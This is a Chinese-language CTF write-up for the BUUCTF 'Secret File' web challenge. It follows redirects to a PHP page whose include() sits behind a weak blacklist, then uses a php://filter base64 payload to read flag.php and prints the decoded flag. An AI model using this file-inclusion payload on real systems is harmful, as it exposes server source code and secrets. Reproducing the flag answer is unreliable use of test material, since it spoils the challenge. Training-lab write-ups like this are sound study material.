[BUUCTF][Web][極客大挑戰 2019]Secret File 1
阿新 • • 發佈:2022-12-11
開啟靶機對應的url
右鍵檢視網頁原始碼,檢視到一個訪問路徑 /Archive_room.php
構造url訪問一下
http://3bfaebad-fdfa-4226-ae0a-551f0228becb.node4.buuoj.cn:81/Archive_room.php
右鍵再次檢視原始碼,有一個訪問路徑./action.php"
http://3bfaebad-fdfa-4226-ae0a-551f0228becb.node4.buuoj.cn:81/action.php
訪問看看
這裡是題眼,提示會去仔細看看,那麼我們用burpsuite抓包看看
發現action 返回的包是個302,裡面其實還有個訪問路徑
HTTP/1.1 302 Found
Server: openresty
Date: Sun, 11 Dec 2022 03:57:35 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Location: end.php
X-Powered-By: PHP/7.3.11
Content-Length: 63
<!DOCTYPE html>
<html>
<!--
secr3t.php
-->
</html>
同樣構造url訪問看看(secr3t.php)
<html> <title>secret</title> <meta charset="UTF-8"> <?php highlight_file(__FILE__); error_reporting(0); $file=$_GET['file']; if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){ echo "Oh no!"; exit(); } include($file); //flag放在了flag.php裡 ?> </html>
先訪問一下flag.php試一下再說
<!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>FLAG</title> </head> <body style="background-color:black;"><br><br><br><br><br><br> <h1 style="font-family:verdana;color:red;text-align:center;">啊哈!你找到我了!可是你看不到我QAQ~~~</h1><br><br><br> <p style="font-family:arial;color:red;font-size:20px;text-align:center;"> 我就在這裡 </p> </body> </html>
既然說就在這裡,那麼嘗試一下php偽協議,看能不能拿到原始碼看看
http://3bfaebad-fdfa-4226-ae0a-551f0228becb.node4.buuoj.cn:81/secr3t.php?file=php://filter/convert.base64-encode/resource=flag.php
返回
<html>
<title>secret</title>
<meta charset="UTF-8">
<?php
highlight_file(__FILE__);
error_reporting(0);
$file=$_GET['file'];
if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
echo "Oh no!";
exit();
}
include($file);
//flag放在了flag.php裡
?>
</html>
PCFET0NUWVBFIGh0bWw+Cgo8aHRtbD4KCiAgICA8aGVhZD4KICAgICAgICA8bWV0YSBjaGFyc2V0PSJ1dGYtOCI+CiAgICAgICAgPHRpdGxlPkZMQUc8L3RpdGxlPgogICAgPC9oZWFkPgoKICAgIDxib2R5IHN0eWxlPSJiYWNrZ3JvdW5kLWNvbG9yOmJsYWNrOyI+PGJyPjxicj48YnI+PGJyPjxicj48YnI+CiAgICAgICAgCiAgICAgICAgPGgxIHN0eWxlPSJmb250LWZhbWlseTp2ZXJkYW5hO2NvbG9yOnJlZDt0ZXh0LWFsaWduOmNlbnRlcjsiPuWViuWTiO+8geS9oOaJvuWIsOaIkeS6hu+8geWPr+aYr+S9oOeci+S4jeWIsOaIkVFBUX5+fjwvaDE+PGJyPjxicj48YnI+CiAgICAgICAgCiAgICAgICAgPHAgc3R5bGU9ImZvbnQtZmFtaWx5OmFyaWFsO2NvbG9yOnJlZDtmb250LXNpemU6MjBweDt0ZXh0LWFsaWduOmNlbnRlcjsiPgogICAgICAgICAgICA8P3BocAogICAgICAgICAgICAgICAgZWNobyAi5oiR5bCx5Zyo6L+Z6YeMIjsKICAgICAgICAgICAgICAgICRmbGFnID0gJ2ZsYWd7Nzk2YmNlYzEtMDliNS00NWFmLThmYmQtNjlmZTE2YjRkMjA5fSc7CiAgICAgICAgICAgICAgICAkc2VjcmV0ID0gJ2ppQW5nX0x1eXVhbl93NG50c19hX2cxcklmcmkzbmQnCiAgICAgICAgICAgID8+CiAgICAgICAgPC9wPgogICAgPC9ib2R5PgoKPC9odG1sPgo=
base64 解密一下,Boom,得到flag
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>FLAG</title>
</head>
<body style="background-color:black;"><br><br><br><br><br><br>
<h1 style="font-family:verdana;color:red;text-align:center;">啊哈!你找到我了!可是你看不到我QAQ~~~</h1><br><br><br>
<p style="font-family:arial;color:red;font-size:20px;text-align:center;">
<?php
echo "我就在這裡";
$flag = 'flag{796bcec1-09b5-45af-8fbd-69fe16b4d209}';
$secret = 'jiAng_Luyuan_w4nts_a_g1rIfri3nd'
?>
</p>
</body>
</html>